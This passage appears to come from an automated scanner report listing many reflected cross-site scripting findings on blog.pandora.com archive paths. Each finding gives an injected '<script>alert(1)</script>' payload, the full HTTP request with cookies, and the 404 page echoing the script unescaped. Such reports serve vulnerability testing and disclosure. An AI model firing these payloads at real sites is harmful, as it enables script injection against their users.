Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives189bf<script>alert(1)</script>7e15ac1b4e2/2008/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload df6e5<script>alert(1)</script>6172eb86b30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008df6e5<script>alert(1)</script>6172eb86b30/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008df6e5<script>alert(1)</script>6172eb86b30/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 150c1<script>alert(1)</script>9c01c9b532d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/05150c1<script>alert(1)</script>9c01c9b532d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/05150c1<script>alert(1)</script>9c01c9b532d/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 15eb9<script>alert(1)</script>7a020e9b0eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora15eb9<script>alert(1)</script>7a020e9b0eb/archives/2008/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora15eb9<script>alert(1)</script>7a020e9b0eb/archives/2008/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec3a9<script>alert(1)</script>a9054eec92c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesec3a9<script>alert(1)</script>a9054eec92c/2008/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesec3a9<script>alert(1)</script>a9054eec92c/2008/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 46068<script>alert(1)</script>eee473a0b7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200846068<script>alert(1)</script>eee473a0b7a/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200846068<script>alert(1)</script>eee473a0b7a/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3962<script>alert(1)</script>2bd69b3ec0b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/06c3962<script>alert(1)</script>2bd69b3ec0b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/06c3962<script>alert(1)</script>2bd69b3ec0b/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47138<script>alert(1)</script>a3f13374191 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora47138<script>alert(1)</script>a3f13374191/archives/2008/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora47138<script>alert(1)</script>a3f13374191/archives/2008/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e4152<script>alert(1)</script>d0196897ba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese4152<script>alert(1)</script>d0196897ba0/2008/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivese4152<script>alert(1)</script>d0196897ba0/2008/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12ccb<script>alert(1)</script>30223f2cf54 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200812ccb<script>alert(1)</script>30223f2cf54/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200812ccb<script>alert(1)</script>30223f2cf54/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9e3c<script>alert(1)</script>20dad2bc554 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/07a9e3c<script>alert(1)</script>20dad2bc554/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/07a9e3c<script>alert(1)</script>20dad2bc554/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56d79<script>alert(1)</script>a4032462556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora56d79<script>alert(1)</script>a4032462556/archives/2008/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora56d79<script>alert(1)</script>a4032462556/archives/2008/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25bf5<script>alert(1)</script>3d971d76d88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives25bf5<script>alert(1)</script>3d971d76d88/2008/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives25bf5<script>alert(1)</script>3d971d76d88/2008/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5abe6<script>alert(1)</script>db42742e74 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20085abe6<script>alert(1)</script>db42742e74/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 348
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20085abe6<script>alert(1)</script>db42742e74/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70934<script>alert(1)</script>e46d04bff1b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/0870934<script>alert(1)</script>e46d04bff1b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/0870934<script>alert(1)</script>e46d04bff1b/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac95c<script>alert(1)</script>f39701078da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraac95c<script>alert(1)</script>f39701078da/archives/2008/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraac95c<script>alert(1)</script>f39701078da/archives/2008/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb2c5<script>alert(1)</script>2ae1ae68fdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archiveseb2c5<script>alert(1)</script>2ae1ae68fdb/2008/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archiveseb2c5<script>alert(1)</script>2ae1ae68fdb/2008/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e57ea<script>alert(1)</script>aa701cd74e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008e57ea<script>alert(1)</script>aa701cd74e3/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008e57ea<script>alert(1)</script>aa701cd74e3/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 500d6<script>alert(1)</script>b55ef145dcc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/09500d6<script>alert(1)</script>b55ef145dcc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/09500d6<script>alert(1)</script>b55ef145dcc/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 872c8<script>alert(1)</script>e32ca06f3d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora872c8<script>alert(1)</script>e32ca06f3d3/archives/2008/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
